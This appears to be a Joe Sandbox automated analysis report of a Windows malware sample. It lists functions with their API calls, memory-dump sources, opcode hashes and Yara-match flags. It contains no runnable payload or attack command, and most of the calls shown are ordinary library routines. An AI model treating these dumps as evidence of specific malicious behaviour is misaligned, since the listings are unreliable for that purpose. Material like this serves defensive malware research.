                                                                  • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00408FE3
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00408FF1
                                                                  • GlobalUnlock.KERNEL32(?), ref: 00409009
                                                                  • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 0040902C
                                                                  • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 00409048
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
                                                                  • String ID:
                                                                  • API String ID: 645133905-0
                                                                  • Opcode ID: 005b3a7b1ba1e7ec0c156c389e7c3750a11e397c02a4dfee90b0cb540f4121ed
                                                                  • Instruction ID: adf4c40781447d7e631396cda822757ebb0fe2e859268748525afa0d866fb1c1
                                                                  • Opcode Fuzzy Hash: 005b3a7b1ba1e7ec0c156c389e7c3750a11e397c02a4dfee90b0cb540f4121ed
                                                                  • Instruction Fuzzy Hash: D8C11A70A00209EFCF14DF65C9889AEBBBAFF88304B10456AF811EB291D779DD41CB65
                                                                  Function 021F14A0 Relevance: 12.2, APIs: 8, Instructions: 171COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetLastError.KERNEL32(0000007F), ref: 021F14DB
                                                                  • SetLastError.KERNEL32(0000007F), ref: 021F1507
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1452528299-0
                                                                  • Opcode ID: f649229c1163f016b07f91870c78222a302cc32415b555731e65e4864fe24baf
                                                                  • Instruction ID: ae90ad17b81990faae996a2770a16cd596a6d8563d349f4f4af14a0506dee22f
                                                                  • Opcode Fuzzy Hash: f649229c1163f016b07f91870c78222a302cc32415b555731e65e4864fe24baf
                                                                  • Instruction Fuzzy Hash: E4712874E40109EFDB48DF94C590BAEB7B2FF48304F248599D62AAB351D774AA81CF90
                                                                  Function 0041773D Relevance: 12.2, APIs: 8, Instructions: 169COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(00000000,?,00432B10,00000038,00415751,?,00000000,00000000,0040FE1B,00000000,00000000,004322F0,0000001C,0040FB4A,00000001,00000020), ref: 0041777B
                                                                  • GetCPInfo.KERNEL32(00000000,00000001), ref: 0041778E
                                                                  • _strlen.LIBCMT ref: 004177B2
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,0040FE1B,?,00000000,00000000), ref: 004177D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Info$ByteCharMultiWide_strlen
                                                                  • String ID:
                                                                  • API String ID: 1335377746-0
                                                                  • Opcode ID: 16f72e5b873a4ab48f6271f059b37c8091238466f59f76de78d94d45d57762bb
                                                                  • Instruction ID: c96e7402d8f87136a9c376d92da51b645b4312610aa90fcb7a9bffc7d4a68029
                                                                  • Opcode Fuzzy Hash: 16f72e5b873a4ab48f6271f059b37c8091238466f59f76de78d94d45d57762bb
                                                                  • Instruction Fuzzy Hash: 25518E70A04218EBDF21AFA6DC89DEFBBB9EF84354F24412BF415A2290D7345D91CB64
                                                                  Function 00426D32 Relevance: 12.1, APIs: 8, Instructions: 134windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00426D37
                                                                    • Part of subcall function 0040D93F: __EH_prolog.LIBCMT ref: 0040D944
                                                                  • GetCapture.USER32 ref: 0042750F
                                                                  • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 00427528
                                                                  • GetFocus.USER32 ref: 0042753A
                                                                  • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 00427546
                                                                  • GetLastActivePopup.USER32(?), ref: 0042756D
                                                                  • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 00427578
                                                                  • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0042759C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$H_prolog$ActiveCaptureFocusLastPopup
                                                                  • String ID:
                                                                  • API String ID: 2915395904-0
                                                                  • Opcode ID: 985eb66304feea1a64375c5613d292e13957ddd9534c99a91611df43f47409d5
                                                                  • Instruction ID: 19a528a7567d654ee424c3ff896293cafdfeef5f92fb810e1dffabcbd8df109d
                                                                  • Opcode Fuzzy Hash: 985eb66304feea1a64375c5613d292e13957ddd9534c99a91611df43f47409d5
                                                                  • Instruction Fuzzy Hash: 0541F071704228BFCB24AB65EC44E7FB6A9EF44384B60043FF101D3690CB78CC829669
                                                                  Function 00412A67 Relevance: 12.1, APIs: 8, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32(76230A60,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412A83
                                                                  • GetLastError.KERNEL32(?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412A97
                                                                  • GetEnvironmentStringsW.KERNEL32(76230A60,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412AB9
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,76230A60,00000000,?,?,?,?,0040E927), ref: 00412AED
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412B0F
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412B28
                                                                  • GetEnvironmentStrings.KERNEL32(76230A60,00000000,?,?,?,?,0040E927,?,00431A70,00000060), ref: 00412B3E
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00412B7A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 883850110-0
                                                                  • Opcode ID: 1a7aa8cc262657e72444d06c6bde20108307b8118384107d7f56e1d07f72045c
                                                                  • Instruction ID: accb5785985df4b6819ef042d50e533d603ff3fa48001b7d390ff30f191b463a
                                                                  • Opcode Fuzzy Hash: 1a7aa8cc262657e72444d06c6bde20108307b8118384107d7f56e1d07f72045c
                                                                  • Instruction Fuzzy Hash: 9F3159726082656FD7302F759EC48BBB78CEB45394715083BF142C3250E6E86CE582BD
                                                                  Function 0041F239 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalLock.KERNEL32(?), ref: 0041F256
                                                                  • lstrcmpA.KERNEL32(?,?), ref: 0041F262
                                                                  • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0041F274
                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041F294
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041F29C
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0041F2A6
                                                                  • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0041F2B3
                                                                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 0041F2CB
                                                                    • Part of subcall function 0042663E: GlobalFlags.KERNEL32(?), ref: 00426648
                                                                    • Part of subcall function 0042663E: GlobalUnlock.KERNEL32(?,00000000,?,0041F2C5,?,00000000,?,?,00000000,00000000,00000002), ref: 00426659
                                                                    • Part of subcall function 0042663E: GlobalFree.KERNEL32(?), ref: 00426664
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                  • String ID:
                                                                  • API String ID: 168474834-0
                                                                  • Opcode ID: c54c654e90a360fa660b54eee4c91334e9e2f47313cccc9f547efc29e8fe9139
                                                                  • Instruction ID: 8fa5d7953f2ec37764842a3f19103b125725ee6fb1def39efba1f66d7d1e0517
                                                                  • Opcode Fuzzy Hash: c54c654e90a360fa660b54eee4c91334e9e2f47313cccc9f547efc29e8fe9139
                                                                  • Instruction Fuzzy Hash: 51110676200104BEDB216BA6CC45DAFBABDEF84700B50046EF605D1220D73AC992DB78
                                                                  Function 022612B0 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 396COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E?*$a7a&$a7a&$Ei$Ei
                                                                  • API String ID: 0-288907479
                                                                  • Opcode ID: 709adfc9c84f7bed254e0d089e0ae38cc9465eeb11da256b68669de6ba8dc5f6
                                                                  • Instruction ID: c3c1a4a0a74ef334ffef270d45007926b0fc61ba4346c4bbf4ceb0d3c24f7a67
                                                                  • Opcode Fuzzy Hash: 709adfc9c84f7bed254e0d089e0ae38cc9465eeb11da256b68669de6ba8dc5f6
                                                                  • Instruction Fuzzy Hash: 4BE1B0726243428BC718DFE4D498A7FB3E2ABC4744F14491DE48ACB348DB74E995CB92
                                                                  Function 00404B45 Relevance: 10.7, APIs: 7, Instructions: 247memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00404B4A
                                                                  • MapDialogRect.USER32(?,?), ref: 00404BD8
                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00404BF9
                                                                  • CLSIDFromString.OLE32(?,00000004), ref: 00404CF7
                                                                  • CLSIDFromProgID.OLE32(?,00000004), ref: 00404CFF
                                                                  • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 00404D9B
                                                                  • SysFreeString.OLEAUT32(?), ref: 00404DEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                  • String ID:
                                                                  • API String ID: 493809305-0
                                                                  • Opcode ID: 90d6fed022f37205e91faeaac6504b74e0f75d282e9fda82b03ffbdba748a2f0
                                                                  • Instruction ID: b3c49ecfdae2261962f2f72699b3bcc1d5c4594392ee8f9afc26f4e19ff51694
                                                                  • Opcode Fuzzy Hash: 90d6fed022f37205e91faeaac6504b74e0f75d282e9fda82b03ffbdba748a2f0
                                                                  • Instruction Fuzzy Hash: A1A146B1900219DFDB14DFA9D884AEEBBB4FF48304F10452EE919A7391D738A951CFA4
                                                                  Function 004148BE Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 216COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00411DA5: GetLastError.KERNEL32(?,00000000,0040F9CC,004108AA,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010,0041200F), ref: 00411DA7
                                                                    • Part of subcall function 00411DA5: FlsGetValue.KERNEL32(?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DB5
                                                                    • Part of subcall function 00411DA5: FlsSetValue.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DDC
                                                                    • Part of subcall function 00411DA5: GetCurrentThreadId.KERNEL32 ref: 00411DF4
                                                                    • Part of subcall function 00411DA5: SetLastError.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411E0B
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414930
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414A2D
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414A86
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414AA3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414AC6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                  • String ID: ^@
                                                                  • API String ID: 223281555-3067454934
                                                                  • Opcode ID: 661871ab33832ade7b7aaf52d2a942668b7e032303f44cc99fa12acc2a8bb67a
                                                                  • Instruction ID: d8969bca762c2fff75cd20f14addf9e5daf178b08686a22cb2c5a04f5c96d0d7
                                                                  • Opcode Fuzzy Hash: 661871ab33832ade7b7aaf52d2a942668b7e032303f44cc99fa12acc2a8bb67a
                                                                  • Instruction Fuzzy Hash: 1F61D8B6A40305AFDB14DFA9CC41BABB3B6EFC4354F25412FF5009B281D7B999808B58
                                                                  Function 00421820 Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 0042184E
                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00421875
                                                                  • UpdateWindow.USER32(?), ref: 0042188F
                                                                  • SendMessageA.USER32(?,00000121,00000000,?), ref: 004218B3
                                                                  • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 004218CD
                                                                  • UpdateWindow.USER32(?), ref: 00421913
                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00421947
                                                                    • Part of subcall function 00423CEB: GetWindowLongA.USER32(?,000000F0), ref: 00423CF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                  • String ID:
                                                                  • API String ID: 2853195852-0
                                                                  • Opcode ID: b2be0544251454af26a063944dae0fad199999050631c7f4df3474e00c2e4742
                                                                  • Instruction ID: bda951081c485ca147d81411007fe1a190cd778f32f816f53062b6f76fcfd76d
                                                                  • Opcode Fuzzy Hash: b2be0544251454af26a063944dae0fad199999050631c7f4df3474e00c2e4742
                                                                  • Instruction Fuzzy Hash: 2141E4307043519BD731AF26AC84A2BBAF4FFD1758F90092EF48192271C73A8946CB5A
                                                                  Function 0040698F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114comstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00406994
                                                                  • GetObjectA.GDI32(00405B22,0000003C,?), ref: 00406A00
                                                                  • lstrlenA.KERNEL32(?), ref: 00406A11
                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 00406A88
                                                                  • OleCreateFontIndirect.OLEAUT32(00000020,00433CFC,?), ref: 00406AB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
                                                                  • String ID:
                                                                  • API String ID: 4082312370-3916222277
                                                                  • Opcode ID: 61b9ff90e36958d84cbc1077bd490824df986479636f83f491aa45025cd70d28
                                                                  • Instruction ID: c4ebfa65322681a217c67680f7c020fd47e848ba818764bf4c75e36be929e26e
                                                                  • Opcode Fuzzy Hash: 61b9ff90e36958d84cbc1077bd490824df986479636f83f491aa45025cd70d28
                                                                  • Instruction Fuzzy Hash: 34417771E002199BCB10EFE5D845AADBBB4BF18308F10817EE556F7291E7388A09CB54
                                                                  Function 00428790 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00428795
                                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00428875
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00428892
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,Software\), ref: 004288B2
                                                                  • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 004288CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CloseEnumH_prologOpenQueryValue
                                                                  • String ID: Software\
                                                                  • API String ID: 2161548231-964853688
                                                                  • Opcode ID: f4d1ca52cbf1251d97ab6773c42b41e562382329021e483681a562ce626031c5
                                                                  • Instruction ID: 0a6b551ca9cc724c7325d587e2d88eb9b1ee1faeb4156374ebf6c637dd52548d
                                                                  • Opcode Fuzzy Hash: f4d1ca52cbf1251d97ab6773c42b41e562382329021e483681a562ce626031c5
                                                                  • Instruction Fuzzy Hash: 4241C331A001289BDB21EB65DC41EEEB7B9EF49304F9041AEF145A2191CB789A52CF98
                                                                  Function 00403CE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemMenu.USER32(?,00000000,?,?,?,?,?,0042CC28,000000FF), ref: 00403D06
                                                                  • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00403D6D
                                                                  • AppendMenuA.USER32(?,00000000,00000010,00000010), ref: 00403D78
                                                                    • Part of subcall function 00403920: FindResourceA.KERNEL32(?,?,00000006), ref: 0040393A
                                                                  • SendMessageA.USER32(?,00000080,00000001,?), ref: 00403DB5
                                                                  • SendMessageA.USER32(?,00000080,00000000,?), ref: 00403DC9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Menu$AppendMessageSend$FindResourceSystem
                                                                  • String ID: loopback
                                                                  • API String ID: 858472958-3546420730
                                                                  • Opcode ID: 4598b109ee9e33227e9328b0220a52c1a9e23e073aa70865d030f30849e1bb02
                                                                  • Instruction ID: 4823e85a43f7f0f7c6a3d4925acab711e54c1865e72890e5d36366e388cdfcd7
                                                                  • Opcode Fuzzy Hash: 4598b109ee9e33227e9328b0220a52c1a9e23e073aa70865d030f30849e1bb02
                                                                  • Instruction Fuzzy Hash: 26319E71240701ABD324EF65DC45F97B7A8FF84720F408A1EF6569B2D1CBB8A805CB58
                                                                  Function 00429A96 Relevance: 10.6, APIs: 7, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0043F1BC,00000000,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF), ref: 00429AA6
                                                                  • TlsGetValue.KERNEL32(0043F1A0,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399), ref: 00429AC4
                                                                  • LocalAlloc.KERNEL32(00000000,00000003,00000010,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940), ref: 00429B20
                                                                  • LocalReAlloc.KERNEL32(?,00000003,00000002,00000010,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3), ref: 00429B32
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399), ref: 00429B3F
                                                                  • TlsSetValue.KERNEL32(0043F1A0,00000000), ref: 00429B6F
                                                                  • LeaveCriticalSection.KERNEL32(0043F1BC,?,?,0043F1A0,?,00429D0E,?,00000000,?,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399), ref: 00429B90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
